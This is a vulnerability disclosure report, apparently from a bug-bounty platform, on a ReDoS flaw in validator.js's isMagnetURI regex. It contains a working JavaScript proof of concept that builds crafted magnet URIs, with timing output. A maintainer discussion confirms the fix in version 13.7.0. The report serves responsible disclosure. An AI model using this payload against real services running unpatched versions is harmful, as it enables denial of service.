Inefficient Regular Expression Complexity in validatorjs/validator.js
Reported on
Sep 17th 2021
Description
I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in validator.
It allows cause a denial of service when validating crafted invalid MagnetURIs.
The ReDoS vulnerability is mainly due to the sub-pattern .+&tr=.+ with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var validator = require("validator")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = 'magnet:?xt=urn:a:'+'a'.repeat(32)+'&dn='+'&tr='.repeat(i*10000)+"\r\na\r\n";
validator.isMagnetURI(attack_str);
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
The Output
"attack_str.length: 40058: 464 ms"
"attack_str.length: 80058: 1717 ms"
"attack_str.length: 120058: 3864 ms"
"attack_str.length: 160058: 6871 ms"
"attack_str.length: 200058: 10895 ms"
"attack_str.length: 240058: 15493 ms"
Occurrences
SECURITY.md
2 years ago
Thank you Yeting Li for reporting this ReDOS. A fix has been submitted and is awaiting merge!
Hi, Sarhan, thank you for your confirmation. And I just checked that the fixed regex is safe.
Same here! Once we have confirmed the fix, we can go ahead and publish a CVE on your behalf.
Thanks! 🎊
@yetingli - thanks for the comment, we no longer assign CVEs to Inefficient Regular Expression Complexity.
We are doing this for our own internal quality and vetting process on reports before disclosing publicly via CVE.
Thank you guys! We finally released the fix in validator 13.7.0.